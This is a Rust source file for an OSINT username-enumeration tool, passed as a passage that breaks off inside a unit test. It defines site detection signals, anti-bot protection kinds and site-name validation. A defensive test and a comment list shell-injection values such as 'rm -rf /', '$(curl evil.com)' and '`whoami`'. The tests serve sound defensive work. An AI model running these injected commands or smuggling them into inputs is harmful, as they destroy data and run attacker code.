Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
32/// One site we can probe for the existence of an account.
33#[derive(Debug, Clone, Serialize, Deserialize)]
34pub struct Site {
35    /// Human-readable site name. Doubles as the stable filter key
36    /// (case-insensitive) used by CLI `--only` / `--exclude`.
37    pub name: String,
38    /// URL template containing a `{username}` placeholder.
39    pub url: UrlTemplate,
40    /// Ordered list of detection signals. Aggregated per the type-level docs.
41    /// Optional in source JSON when [`Site::engine`] is set — the engine's
42    /// signals are inherited at load time. After
43    /// [`crate::Registry`] resolution this vec is always non-empty (or the
44    /// site fails `validate`).
45    #[serde(default, skip_serializing_if = "Vec::is_empty")]
46    pub signals: Vec<Signal>,
47    /// One or more usernames known to exist on this site. Consumed by
48    /// `adler doctor` to verify the signal list still reports `Found`
49    /// for a real account. Accepts either a single string or an array
50    /// of strings in JSON; the doctor probes each in declaration order
51    /// and passes the present-check if **any** one of them resolves to
52    /// `Found`. Listing several is defensive — brand accounts or other
53    /// users that the site special-cases (e.g. Instagram's own
54    /// `instagram` account) shouldn't false-fail the whole site.
55    #[serde(default, skip_serializing_if = "Option::is_none")]
56    pub known_present: Option<KnownPresent>,
57    /// Username known to *not* exist on this site (optional). When omitted,
58    /// the doctor generates a random nonsense username instead.
59    #[serde(default, skip_serializing_if = "Option::is_none")]
60    pub known_absent: Option<String>,
61    /// Optional CSS-selector rules for pulling profile fields (name, bio,
62    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
63    #[serde(default, skip_serializing_if = "Vec::is_empty")]
64    pub extract: Vec<Extractor>,
65    /// Free-form classification tags for scanning a subset of the registry,
66    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
67    /// A site with no tags is universal (included unless a `--tag` filter
68    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
69    /// convention, not enforced.
70    #[serde(default, skip_serializing_if = "Vec::is_empty")]
71    pub tags: Vec<String>,
72    /// Extra HTTP headers to send with the probe (e.g.
73    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
74    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
75    /// backends apply them via `Network.setExtraHTTPHeaders` before
76    /// navigation; the raw-HTTP path doesn't read this yet.
77    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
78    pub request_headers: std::collections::BTreeMap<String, String>,
79    /// Optional regular expression describing usernames a site will
80    /// accept. When set and the scanned username doesn't match, the
81    /// site is skipped (the outcome is reported as `Uncertain` with
82    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
83    /// Saves work AND avoids the false-positive class where a site
84    /// 404s on illegal usernames in ways our signal can't tell apart
85    /// from a missing account.
86    ///
87    /// Imported from Sherlock's `regexCheck` field; 95+ sites
88    /// upstream carry one (length bounds, character classes, etc.).
89    /// Validation at load time compiles the regex with `regex::Regex`
90    /// — a malformed pattern rejects the site rather than silently
91    /// degrading at scan time.
92    #[serde(default, skip_serializing_if = "Option::is_none")]
93    pub regex_check: Option<String>,
94    /// Name of a shared [`Engine`] this site inherits from (e.g.
95    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
96    /// thousands of instances with identical detection signatures;
97    /// defining the signature once on an engine and inheriting it
98    /// keeps the registry small and the cost of a platform-wide
99    /// HTML change one fix instead of hundreds.
100    ///
101    /// At registry-load time the engine fields are merged *under* the
102    /// site's own — anything the site declares explicitly (`signals`,
103    /// `request_headers`, `regex_check`) wins on
104    /// conflict; anything left empty / unset is filled from the
105    /// engine. An `engine: "X"` referring to a non-existent X is a
106    /// load-time error.
107    #[serde(default, skip_serializing_if = "Option::is_none")]
108    pub engine: Option<String>,
109    /// Characters the site silently drops from the username server-side
110    /// before matching — `john.doe` and `johndoe` resolve to the same
111    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
112    /// at probe time so the URL we issue matches the canonical form
113    /// the site uses, avoiding a false `NotFound` on a benign
114    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
115    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
116    #[serde(default, skip_serializing_if = "Option::is_none")]
117    pub strip_bad_char: Option<String>,
118    /// HTTP method used to probe this site. Defaults to GET — the vast
119    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
120    /// some Discord/Holopin endpoints) only answer to POST.
121    #[serde(default, skip_serializing_if = "is_default_method")]
122    pub request_method: HttpMethod,
123    /// Request body to send when [`Site::request_method`] is POST. The
124    /// literal `{username}` placeholder is substituted with the probe
125    /// username (same as URL templates). For GraphQL endpoints this
126    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
127    #[serde(default, skip_serializing_if = "Option::is_none")]
128    pub request_body: Option<String>,
129    /// Specific anti-bot mechanisms the site is known to deploy. A
130    /// richer alternative to the flat `bot-protected` tag — knowing
131    /// *which* protection a site uses lets future routing pick the
132    /// right backend (`Cloudflare` → cloudscraper-style bypass,
133    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
134    /// of the all-or-nothing `bot-protected` decision.
135    ///
136    /// Independent of [`Site::tags`]: the existing `bot-protected`
137    /// tag stays as a back-compat shorthand and routes through the
138    /// browser backend exactly as before. When this vector is
139    /// non-empty Adler also treats the site as bot-protected
140    /// regardless of the tag.
141    #[serde(default, skip_serializing_if = "Vec::is_empty")]
142    pub protection: Vec<ProtectionKind>,
143    /// Disable the site without removing it from the registry.
144    /// Disabled sites are skipped by [`crate::Registry::filter`] —
145    /// they don't get probed, don't appear in `--list-sites`, and
146    /// don't count toward the doctor's tally. Useful for parking
147    /// known-broken entries with a reason comment instead of
148    /// deleting them outright, so a future contributor can re-enable
149    /// the entry by flipping the flag once they've authored a
150    /// working signature.
151    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
152    pub disabled: bool,
153    /// Canonical-source link for mirror-style sites. When a site is
154    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
155    /// `YouTube`), `source` carries the name of the primary site this
156    /// one mirrors. Lets future UX surface "Twitter is offline,
157    /// here's the same account on Nitter" without hand-curated
158    /// linkage. Empty / `None` for canonical sites and sites with
159    /// no known mirror relationship.
160    #[serde(default, skip_serializing_if = "Option::is_none")]
161    pub source: Option<String>,
162    /// Approximate popularity rank — lower numbers are more popular.
163    /// Used by `adler --top N` to scan only the most-popular N sites
164    /// (useful for fast checks of high-signal targets). Ranks are
165    /// curated, not derived from traffic data: the seed set covers
166    /// well-known OSINT-relevant sites where most users have
167    /// accounts. Sites without a rank are skipped by `--top N`.
168    #[serde(default, skip_serializing_if = "Option::is_none")]
169    pub popularity: Option<u32>,
170    /// Egress requirement for reaching this site — country and/or IP
171    /// type the probe must exit from (see [`AccessPolicy`]). Default
172    /// (empty) means no special routing: the request uses the client's
173    /// default egress. When constrained and no configured egress fits,
174    /// the probe is reported `Uncertain(GeoUnavailable)` rather than
175    /// fetched from the wrong location.
176    #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
177    pub access: AccessPolicy,
178}
179
180/// A specific anti-bot mechanism a site is known to deploy. Used to
181/// route probes to the right backend (raw HTTP, cloudscraper, full
182/// browser) and to inform users what blocks reliable detection.
183#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
184#[serde(rename_all = "kebab-case")]
185#[non_exhaustive]
186pub enum ProtectionKind {
187    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
188    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
189    /// (e.g. `FlareSolverr`) without a full browser.
190    Cloudflare,
191    /// AWS `CloudFront` edge protection. Often UA-strictness only.
192    Cloudfront,
193    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
194    /// challenge model to Cloudflare.
195    DdosGuard,
196    /// Cloudflare's JS-challenge ("I am under attack" mode).
197    /// Needs a JS-executing backend.
198    CfJsChallenge,
199    /// Cloudflare's WAF firewall blocking by signature, requiring
200    /// a real browser fingerprint to clear.
201    CfFirewall,
202    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
203    /// client by its TLS handshake shape, not its UA).
204    TlsFingerprint,
205    /// `Anubis` proof-of-work challenge. Used by codeberg + a
206    /// growing number of FOSS projects to discourage scraping.
207    Anubis,
208    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
209    /// always blocking — `Uncertain` is the honest answer.
210    Captcha,
211    /// Trivial UA-strictness: rejects unknown User-Agent strings
212    /// but lets through a real-browser UA. Cheapest to bypass.
213    UserAgent,
214    /// Endpoint requires authentication; no anonymous probe path
215    /// exists. Practically unscrapable for OSINT.
216    UserAuth,
217}
218
219/// HTTP method used to probe a site. Only GET and POST are supported.
220#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
221#[serde(rename_all = "UPPERCASE")]
222pub enum HttpMethod {
223    /// Standard GET — the default for ~99% of sites in the registry.
224    #[default]
225    Get,
226    /// POST — for API endpoints that only differentiate accounts via a
227    /// body payload (GraphQL queries, form submissions). Pair with
228    /// [`Site::request_body`].
229    Post,
230}
231
232/// serde's `skip_serializing_if` callback contract requires a
233/// reference, so the by-value lint on a 1-byte type doesn't apply.
234#[allow(clippy::trivially_copy_pass_by_ref)]
235fn is_default_method(m: &HttpMethod) -> bool {
236    matches!(m, HttpMethod::Get)
237}
238
239/// Shared detection signature template for a family of sites that
240/// run the same forum / blog / wiki software (Discourse, vBulletin,
241/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
242///
243/// Engines carry the same kinds of fields as a [`Site`] does (just
244/// the inheritable ones — there's no per-engine `url`, that comes
245/// from the site itself). At registry load, the engine's fields
246/// are merged *under* each referring site's own fields: site wins
247/// on conflict.
248#[derive(Debug, Clone, Default, Serialize, Deserialize)]
249#[non_exhaustive]
250pub struct Engine {
251    /// Default detection signals for sites of this family.
252    /// Inherited only when the site itself declares no `signals`.
253    #[serde(default, skip_serializing_if = "Vec::is_empty")]
254    pub signals: Vec<Signal>,
255    /// Default extra HTTP headers (e.g. a User-Agent that the
256    /// platform accepts where the browser default gets blocked).
257    /// Merged with the site's own headers; site wins per-key.
258    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
259    pub request_headers: std::collections::BTreeMap<String, String>,
260    /// Default username-validity regex inherited only when the site
261    /// itself doesn't declare one.
262    #[serde(default, skip_serializing_if = "Option::is_none")]
263    pub regex_check: Option<String>,
264}
265
266impl Engine {
267    /// Compile-check the engine's own constraints — the inheritable
268    /// fields are subject to the same validation as a site's would
269    /// be.
270    ///
271    /// # Errors
272    /// Returns [`Error::InvalidSite`] when the engine name is
273    /// empty, a signal carries an empty marker, or any other
274    /// constraint a [`Site::validate`] would also flag.
275    pub fn validate(&self, name: &str) -> Result<()> {
276        if name.trim().is_empty() {
277            return Err(Error::InvalidSite {
278                reason: "engine name is empty".into(),
279            });
280        }
281        for signal in &self.signals {
282            signal.validate().map_err(|reason| Error::InvalidSite {
283                reason: format!("engine {name:?}: {reason}"),
284            })?;
285        }
286        if let Some(pat) = &self.regex_check {
287            if let Err(err) = regex::Regex::new(pat) {
288                // The Rust `regex` crate refuses look-around for DoS
289                // reasons; some upstream registries (Sherlock, WMN)
290                // ship patterns that need it. Downgraded from WARN to
291                // DEBUG: it's a known structural limit, the probe
292                // path falls back gracefully, and the noise dominated
293                // CLI startup.
294                tracing::debug!(
295                    engine = %name, pattern = %pat, error = %err,
296                    "engine regex_check did not compile; gate disabled for inheriting sites",
297                );
298            }
299        }
300        Ok(())
301    }
302
303    /// Fill the inheritable empty / unset fields of `site` from
304    /// this engine. Site fields are authoritative: if the site has
305    /// any signals at all, no engine signals are merged in.
306    /// `request_headers` merge per-key (site wins on per-key
307    /// conflict).
308    pub fn merge_into(&self, site: &mut Site) {
309        if site.signals.is_empty() {
310            site.signals.clone_from(&self.signals);
311        }
312        for (k, v) in &self.request_headers {
313            site.request_headers
314                .entry(k.clone())
315                .or_insert_with(|| v.clone());
316        }
317        if site.regex_check.is_none() {
318            site.regex_check.clone_from(&self.regex_check);
319        }
320    }
321}
322
323/// Known-present declaration on a [`Site`].
324///
325/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
326/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
327/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
328/// the site was authored with, so single-username entries stay
329/// compact.
330#[derive(Debug, Clone, Serialize, Deserialize)]
331#[serde(untagged)]
332#[non_exhaustive]
333pub enum KnownPresent {
334    /// Exactly one candidate username.
335    Single(String),
336    /// Two or more candidate usernames. Doctor passes if any resolve
337    /// to `Found`.
338    Multiple(Vec<String>),
339}
340
341impl KnownPresent {
342    /// View all candidate usernames as a slice, in declaration order.
343    /// Always non-empty for `Single`; may be empty for a hand-authored
344    /// `Multiple([])` (validation rejects that).
345    pub fn as_slice(&self) -> &[String] {
346        match self {
347            Self::Single(s) => std::slice::from_ref(s),
348            Self::Multiple(v) => v.as_slice(),
349        }
350    }
351
352    /// Primary candidate — the first declared username. `Single`
353    /// always has one; `Multiple` may be empty if a contributor wrote
354    /// `[]` (caught by [`Site::validate`]).
355    pub fn primary(&self) -> Option<&str> {
356        self.as_slice().first().map(String::as_str)
357    }
358}
359
360impl From<&str> for KnownPresent {
361    fn from(s: &str) -> Self {
362        Self::Single(s.to_owned())
363    }
364}
365
366impl From<String> for KnownPresent {
367    fn from(s: String) -> Self {
368        Self::Single(s)
369    }
370}
371
372/// Upper bound on a site name's length. Names appear in CLI output,
373/// CSV columns, and the validate-sites.yml workflow's run-summary
374/// table — keeping them short avoids both UI breakage and
375/// pathological CI artefacts.
376const NAME_MAX_LEN: usize = 80;
377
378/// True when `name` consists only of characters safe to interpolate
379/// into shell, CSV, and CLI argument contexts. Matches the JSON
380/// Schema pattern `^[\w][\w .()!/+-]*$`.
381fn is_safe_site_name(name: &str) -> bool {
382    let mut chars = name.chars();
383    match chars.next() {
384        Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
385        _ => return false,
386    }
387    chars.all(|c| {
388        c.is_ascii_alphanumeric()
389            || c == '_'
390            || c == ' '
391            || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
392    })
393}
394
395/// A rule for extracting one profile field from a page.
396#[derive(Debug, Clone, Serialize, Deserialize)]
397pub struct Extractor {
398    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
399    pub field: String,
400    /// CSS selector locating the element.
401    pub selector: String,
402    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
403    /// element's trimmed text content is used.
404    #[serde(default, skip_serializing_if = "Option::is_none")]
405    pub attr: Option<String>,
406}
407
408impl Site {
409    /// Render the site URL for a given username.
410    ///
411    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
412    /// those characters are removed from `username` before
413    /// substitution — so a `john.doe` probe against a site that
414    /// lists `strip_bad_char: "."` actually hits the URL for
415    /// `johndoe`, matching the canonical form the site stores
416    /// internally.
417    pub fn url_for(&self, username: &Username) -> String {
418        let raw = username.as_str();
419        match self.strip_bad_char.as_deref() {
420            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
421                let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
422                self.url.substitute(&stripped)
423            }
424            _ => self.url.substitute(raw),
425        }
426    }
427
428    /// Validate semantic invariants the type system can't enforce
429    /// (empty signals list, empty markers, empty status code sets).
430    pub fn validate(&self) -> Result<()> {
431        if self.name.trim().is_empty() {
432            return Err(Error::InvalidSite {
433                reason: "site name is empty".into(),
434            });
435        }
436        // Site names doubled as shell-interpolation values in the
437        // `validate-sites.yml` PR gate; an unsanitised name like
438        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
439        // quoting and run arbitrary commands on the runner. Both the
440        // JSON Schema and this Rust loader enforce a safe character
441        // class (word chars plus a few visual punctuation marks) at
442        // every entry point.
443        if self.name.len() > NAME_MAX_LEN {
444            return Err(Error::InvalidSite {
445                reason: format!(
446                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
447                    self.name
448                ),
449            });
450        }
451        if !is_safe_site_name(&self.name) {
452            return Err(Error::InvalidSite {
453                reason: format!(
454                    "site name {:?} contains characters outside the allowed \
455                     set (word chars, space, `.()!/+-`)",
456                    self.name
457                ),
458            });
459        }
460        if self.signals.is_empty() {
461            return Err(Error::InvalidSite {
462                reason: format!("site {:?}: signals list is empty", self.name),
463            });
464        }
465        for signal in &self.signals {
466            signal.validate().map_err(|reason| Error::InvalidSite {
467                reason: format!("site {:?}: {reason}", self.name),
468            })?;
469        }
470        for extractor in &self.extract {
471            if extractor.field.trim().is_empty() {
472                return Err(Error::InvalidSite {
473                    reason: format!("site {:?}: extractor has an empty field name", self.name),
474                });
475            }
476            if scraper::Selector::parse(&extractor.selector).is_err() {
477                return Err(Error::InvalidSite {
478                    reason: format!(
479                        "site {:?}: invalid CSS selector {:?} for field {:?}",
480                        self.name, extractor.selector, extractor.field
481                    ),
482                });
483            }
484        }
485        if let Some(pat) = &self.regex_check {
486            if let Err(err) = regex::Regex::new(pat) {
487                // Sherlock's regexes occasionally use lookarounds
488                // (e.g. `(?![.-])`), which the Rust `regex` crate
489                // doesn't support — it's a true regular-language
490                // engine for performance + DoS safety. Rather than
491                // reject the whole site over a username-gate the
492                // probe path will simply skip and let the site keep
493                // working at the cost of one wasted probe per
494                // illegal username. Logged at DEBUG (not WARN) — it's
495                // a known structural limit, ~8 sites in the embedded
496                // registry need look-around. The noise dominated CLI
497                // startup; set `ADLER_LOG=debug` to see them again.
498                tracing::debug!(
499                    site = %self.name, pattern = %pat, error = %err,
500                    "regex_check did not compile; username-gate disabled for this site",
501                );
502            }
503        }
504        if let Some(kp) = &self.known_present {
505            if kp.as_slice().is_empty() {
506                return Err(Error::InvalidSite {
507                    reason: format!("site {:?}: known_present is an empty list", self.name),
508                });
509            }
510            for name in kp.as_slice() {
511                if name.trim().is_empty() {
512                    return Err(Error::InvalidSite {
513                        reason: format!(
514                            "site {:?}: known_present contains an empty username",
515                            self.name
516                        ),
517                    });
518                }
519            }
520        }
521        for tag in &self.tags {
522            if tag.trim().is_empty() {
523                return Err(Error::InvalidSite {
524                    reason: format!("site {:?}: tag is empty", self.name),
525                });
526            }
527        }
528        Ok(())
529    }
530}
531
532/// URL template containing a `{username}` placeholder.
533///
534/// Validated at construction: must contain the placeholder and start with
535/// `http://` or `https://`.
536#[derive(Debug, Clone, PartialEq, Eq)]
537pub struct UrlTemplate(String);
538
539const PLACEHOLDER: &str = "{username}";
540
541impl UrlTemplate {
542    /// Build a template, validating placeholder and scheme.
543    pub fn new(template: impl Into<String>) -> Result<Self> {
544        let t = template.into();
545        if !t.contains(PLACEHOLDER) {
546            return Err(Error::InvalidSite {
547                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
548            });
549        }
550        if !(t.starts_with("http://") || t.starts_with("https://")) {
551            return Err(Error::InvalidSite {
552                reason: format!("url template must start with http(s)://: {t:?}"),
553            });
554        }
555        Ok(Self(t))
556    }
557
558    fn substitute(&self, username: &str) -> String {
559        self.0.replace(PLACEHOLDER, username)
560    }
561
562    /// Borrow the raw template (with placeholder).
563    pub fn as_str(&self) -> &str {
564        &self.0
565    }
566}
567
568impl fmt::Display for UrlTemplate {
569    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
570        f.write_str(&self.0)
571    }
572}
573
574impl Serialize for UrlTemplate {
575    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
576        self.0.serialize(s)
577    }
578}
579
580impl<'de> Deserialize<'de> for UrlTemplate {
581    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
582        let raw = String::deserialize(d)?;
583        Self::new(raw).map_err(serde::de::Error::custom)
584    }
585}
586
587/// A single piece of evidence about whether an account exists.
588///
589/// Signals are tagged in JSON by their `kind`. New variants will land for
590/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
591/// adding variants is not a breaking change.
592#[derive(Debug, Clone, Serialize, Deserialize)]
593#[serde(tag = "kind", rename_all = "snake_case")]
594#[non_exhaustive]
595pub enum Signal {
596    /// Votes **`Found`** when the response status is in `codes`.
597    StatusFound {
598        /// Status codes that vote for existence. Must be non-empty.
599        codes: Vec<u16>,
600    },
601    /// Votes **`NotFound`** when the response status is in `codes`.
602    StatusNotFound {
603        /// Status codes that vote for non-existence. Must be non-empty.
604        codes: Vec<u16>,
605    },
606    /// Votes **`Found`** when the response body contains `text`.
607    BodyPresent {
608        /// Substring whose appearance votes for existence. Must be non-empty.
609        text: String,
610    },
611    /// Votes **`NotFound`** when the response body contains `text`.
612    BodyAbsent {
613        /// Substring whose appearance votes for non-existence (e.g.
614        /// `"Profile not found"`). Must be non-empty.
615        text: String,
616    },
617    /// Votes **`NotFound`** when the final URL (post-redirect) contains
618    /// `fragment`.
619    RedirectAbsent {
620        /// Substring that, when present in the final URL, indicates the
621        /// account is missing (typically `"/login"` or `"/404"`). Must be
622        /// non-empty.
623        fragment: String,
624    },
625}
626
627/// Probe data extracted from an HTTP response, fed to each [`Signal`].
628///
629/// Internal detection plumbing — not part of the public API.
630#[derive(Debug)]
631pub(crate) struct Probe<'a> {
632    /// HTTP status code.
633    pub(crate) status: u16,
634    /// Final URL after redirects.
635    pub(crate) final_url: &'a str,
636    /// Decoded response body. Empty string when no body-using signal is configured.
637    pub(crate) body: &'a str,
638}
639
640/// What one signal concluded after looking at a probe.
641#[derive(Debug, Clone, Copy, PartialEq, Eq)]
642pub(crate) enum SignalVerdict {
643    /// This signal votes that the account exists.
644    Found,
645    /// This signal votes that the account does not exist.
646    NotFound,
647    /// This signal had nothing to say (its trigger condition didn't match).
648    Ambiguous,
649}
650
651impl Signal {
652    /// True if this signal needs to inspect the response body. Used by the
653    /// client to skip body reads when no signal requires them.
654    pub(crate) fn needs_body(&self) -> bool {
655        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
656    }
657
658    /// Evaluate this signal against a probe and produce a vote.
659    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
660        match self {
661            Self::StatusFound { codes } => {
662                if codes.contains(&probe.status) {
663                    SignalVerdict::Found
664                } else {
665                    SignalVerdict::Ambiguous
666                }
667            }
668            Self::StatusNotFound { codes } => {
669                if codes.contains(&probe.status) {
670                    SignalVerdict::NotFound
671                } else {
672                    SignalVerdict::Ambiguous
673                }
674            }
675            Self::BodyPresent { text } => {
676                if probe.body.contains(text.as_str()) {
677                    SignalVerdict::Found
678                } else {
679                    SignalVerdict::Ambiguous
680                }
681            }
682            Self::BodyAbsent { text } => {
683                if probe.body.contains(text.as_str()) {
684                    SignalVerdict::NotFound
685                } else {
686                    SignalVerdict::Ambiguous
687                }
688            }
689            Self::RedirectAbsent { fragment } => {
690                if probe.final_url.contains(fragment.as_str()) {
691                    SignalVerdict::NotFound
692                } else {
693                    SignalVerdict::Ambiguous
694                }
695            }
696        }
697    }
698
699    /// Human-readable description of why this signal fired against `probe`,
700    /// for verdict explainability. Only meaningful for a signal that voted
701    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
702    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
703        match self {
704            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
705            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
706            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
707            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
708            Self::RedirectAbsent { fragment } => {
709                format!("final URL contains {fragment:?} (redirect_absent)")
710            }
711        }
712    }
713
714    fn validate(&self) -> std::result::Result<(), String> {
715        match self {
716            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
717                if codes.is_empty() {
718                    return Err("status signal codes list is empty".into());
719                }
720            }
721            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
722                if text.is_empty() {
723                    return Err("body signal text is empty".into());
724                }
725            }
726            Self::RedirectAbsent { fragment } => {
727                if fragment.is_empty() {
728                    return Err("redirect signal fragment is empty".into());
729                }
730            }
731        }
732        Ok(())
733    }
734}
735
736/// Aggregate per-signal verdicts into a final [`MatchKind`].
737///
738/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
739/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
740/// docs for why a `NotFound` vote outranks a `Found` vote.
741pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
742where
743    I: IntoIterator<Item = SignalVerdict>,
744{
745    let mut found = false;
746    let mut not_found = false;
747    for v in verdicts {
748        match v {
749            SignalVerdict::Found => found = true,
750            SignalVerdict::NotFound => not_found = true,
751            SignalVerdict::Ambiguous => {}
752        }
753    }
754    if not_found {
755        MatchKind::NotFound
756    } else if found {
757        MatchKind::Found
758    } else {
759        MatchKind::Uncertain
760    }
761}
762
763#[cfg(test)]
764mod tests {
765    use super::*;
766
767    fn site_with(signals: Vec<Signal>) -> Site {
768        Site {
769            name: "Example".into(),
770            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
771            signals,
772            known_present: None,
773            known_absent: None,
774            extract: Vec::new(),
775            tags: Vec::new(),
776            request_headers: std::collections::BTreeMap::new(),
777            regex_check: None,
778            engine: None,
779            strip_bad_char: None,
780            request_method: crate::site::HttpMethod::Get,
781            request_body: None,
782            protection: Vec::new(),
783            disabled: false,
784            source: None,
785            popularity: None,
786            access: crate::AccessPolicy::default(),
787        }
788    }
789
790    #[test]
791    fn url_template_substitutes_placeholder() {
792        let user = Username::new("alice").unwrap();
793        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
794        assert_eq!(site.url_for(&user), "https://example.com/alice");
795    }
796
797    #[test]
798    fn url_for_strips_bad_chars_before_substitution() {
799        let user = Username::new("john.doe").unwrap();
800        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
801        site.strip_bad_char = Some(".".into());
802        assert_eq!(site.url_for(&user), "https://example.com/johndoe");
803    }
804
805    #[test]
806    fn url_for_strip_bad_char_noop_when_no_match() {
807        let user = Username::new("alice").unwrap();
808        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
809        site.strip_bad_char = Some(".".into());
810        assert_eq!(site.url_for(&user), "https://example.com/alice");
811    }
812
813    #[test]
814    fn url_template_rejects_missing_placeholder() {
815        assert!(UrlTemplate::new("https://example.com/users/").is_err());
816    }
817
818    #[test]
819    fn url_template_rejects_bad_scheme() {
820        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
821    }
822
823    #[test]
824    fn validate_requires_non_empty_signals() {
825        let err = site_with(vec![]).validate().unwrap_err();
826        assert!(err.to_string().contains("signals list is empty"));
827    }
828
829    #[test]
830    fn validate_rejects_empty_status_codes() {
831        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
832            .validate()
833            .unwrap_err();
834        assert!(err.to_string().contains("status signal"));
835    }
836
837    #[test]
838    fn validate_rejects_empty_body_text() {
839        let err = site_with(vec![Signal::BodyAbsent {
840            text: String::new(),
841        }])
842        .validate()
843        .unwrap_err();
844        assert!(err.to_string().contains("body signal"));
845    }
846
847    #[test]
848    fn validate_rejects_empty_redirect_fragment() {
849        let err = site_with(vec![Signal::RedirectAbsent {
850            fragment: String::new(),
851        }])
852        .validate()
853        .unwrap_err();
854        assert!(err.to_string().contains("redirect signal"));
855    }
856
857    #[test]
858    fn validate_rejects_shell_metacharacters_in_name() {
859        // The validate-sites.yml workflow used to inject `--only "$name"`
860        // where `$name` came from PR-controlled sites.json. A name like
861        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
862        // and executed on the runner. Schema + this loader both enforce
863        // a safe character class; verify a representative selection of
864        // dangerous chars is rejected.
865        for bad in [
866            "Foo\"; rm -rf /; #",
867            "Bar$(curl evil.com)",
868            "Baz`whoami`",
869            "Qux\\nfoo",
870            "back\\slash",
871            "pipe|ish",
872            "semi;colon",
873            "amp&and",
874            "lt<gt>",
875        ] {
876            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
877            s.name = bad.into();
878            let err = s.validate().unwrap_err();
879            assert!(
880                err.to_string()
881                    .contains("characters outside the allowed set"),
882                "expected unsafe-name rejection for {bad:?}, got {err}",
883            );
884        }
885    }
886
887    #[test]
888    fn validate_accepts_real_world_site_names() {
889        // Cross-check the validation against names we actually ship.
890        for ok in [
891            "GitHub",
892            "Steam Community (User)",
893            "X / Twitter",
894            "osu!",
895            "Eintracht Frankfurt Forum",
896            "Archive of Our Own",
897            "Career.habr",
898            "fl",
899            "GitLab.com",
900            "Sbazar.cz",
901        ] {
